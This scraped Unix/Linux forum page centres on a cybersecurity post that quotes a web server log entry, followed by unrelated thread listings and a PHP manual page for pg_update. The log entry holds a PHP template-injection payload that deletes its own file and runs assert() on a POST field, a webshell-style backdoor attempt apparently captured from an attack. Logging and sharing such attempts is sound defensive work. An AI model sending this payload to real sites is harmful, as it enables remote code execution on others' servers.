Sponsored Content
Special Forums Cybersecurity You are being directed to the US FBI where your IP address and details will also be logged. Post 303039192 by Neo on Wednesday 25th of September 2019 10:43:39 PM
Old 09-25-2019
Logfile entry:

Code:
_SERVER: 

_COOKIE: []

_GET: {"template":"tag_(){};@unlink(_FILE_);assert($_POST[T00ls]);{\/\/..\/rss"}

_POST: []

_SESSION: null

 

6 More Discussions You Might Find Interesting

1. UNIX for Dummies Questions & Answers

know who logged and logged out with their timings

being ordinary user (not having any administrative rights) can avail myself a facility to know who logged and logged out with their timings get popped onto my terminal as if it get echo 'ed... (3 Replies)
Discussion started by: vkandati
3 Replies

2. Ubuntu

tar not reading if output directed to /dev/null

I stumbled across a somewhat strange behavior of tar and find no explanation for it: i was testing a DVD for read errors and thought to simply tar the content and direct the output to /dev/null: tar -cvf - /my/mountpoint/*ts > /dev/null This way i expected the system to read the complete... (4 Replies)
Discussion started by: bakunin
4 Replies

3. IP Networking

Local Lan, no-ip directed DNS forward, surf within lan

Hi, We have a website running on a local centos 5.4 surfer, static IP. The domain.com uses no-ip.com to take care of the DNS, it forwards all to my server. My router receives the port 80 call, routes it to my server and the world can see domain.com perfectly fine. However, we cannot see... (3 Replies)
Discussion started by: lawstudent
3 Replies

4. UNIX for Dummies Questions & Answers

at -l doesnt give details of the scheduled job. How to get the details?

I have scheduled couple of shell scripts to run using 'at' command. The o/p of at -l is: $ at -l 1320904800.a Thu Nov 10 01:00:00 2011 1320894000.a Wed Nov 9 22:00:00 2011 1320876000.a Wed Nov 9 17:00:00 2011 $ uname -a SunOS dc2prcrptetl2 5.9 Generic_122300-54 sun4u sparc... (2 Replies)
Discussion started by: superparticle
2 Replies

5. Shell Programming and Scripting

Double quotes is not present to the directed file

I have the below to direct the values to a xml file, echo "<xml version="1.0">" >> /root/xml/sample.xml but when the check the sample.xml file, the output looks like the below one(without double quotes) <xml version=1.0> but i want the output like <xml version="1.0"> Any help on... (8 Replies)
Discussion started by: vel4ever
8 Replies

6. UNIX for Beginners Questions & Answers

Fetching address and user details from log file

Hi All, I have a requirement to get the address values from a large log file along with the user details. line1,line2,city,stateCode,postalCode,countryCode. The below code as advised in the earlier post is giving the user data zgrep -B1 "Failed to calculate Tax" log.2018-05-23.gz | grep... (8 Replies)
Discussion started by: nextStep
8 Replies
PG_UPDATE(3)															      PG_UPDATE(3)

pg_update - Update table

SYNOPSIS
mixed pg_update (resource $connection, string $table_name, array $data, array $condition, [int $options = PGSQL_DML_EXEC]) DESCRIPTION
pg_update(3) updates records that matches condition with data. If options is specified, pg_convert(3) is applied to data with specified options. PARAMETERS
o $connection - PostgreSQL database connection resource. o $table_name - Name of the table into which to update rows. o $data - An array whose keys are field names in the table $table_name, and whose values are what matched rows are to be updated to. o $condition - An array whose keys are field names in the table $table_name, and whose values are the conditions that a row must meet to be updated. o $options - Any number of PGSQL_CONV_FORCE_NULL, PGSQL_DML_NO_CONV, PGSQL_DML_ESCAPE, PGSQL_DML_EXEC, PGSQL_DML_ASYNC or PGSQL_DML_STRING combined. If PGSQL_DML_STRING is part of the $options then query string is returned. When PGSQL_DML_NO_CONV or PGSQL_DML_ESCAPE is set, it does not call pg_convert(3) internally. RETURN VALUES
Returns TRUE on success or FALSE on failure. Returns string if PGSQL_DML_STRING is passed via $options. EXAMPLES
Example #1 pg_update(3) example <?php $db = pg_connect('dbname=foo'); $data = array('field1'=>'AA', 'field2'=>'BB'); // This is safe, since $_POST is converted automatically $res = pg_update($db, 'post_log', $_POST, $data); if ($res) { echo "Data is updated: $res "; } else { echo "User must have sent wrong inputs "; } ?> CHANGELOG
+-------------+---------------------------------------------------+ | Version | | | | | | | Description | | | | +-------------+---------------------------------------------------+ | 5.6.0 | | | | | | | No longer experimental. Added PGSQL_DML_ESCAPE | | | constant, TRUE/ FALSE and NULL data type support. | | | | |5.5.3/5.4.19 | | | | | | | Direct SQL injection to $table_name and Indirect | | | SQL injection to identifiers are fixed. | | | | +-------------+---------------------------------------------------+ SEE ALSO
pg_convert(3). PHP Documentation Group PG_UPDATE(3)
All times are GMT -4. The time now is 02:18 PM.
Unix & Linux Forums Content Copyright 1993-2022. All Rights Reserved.
Privacy Policy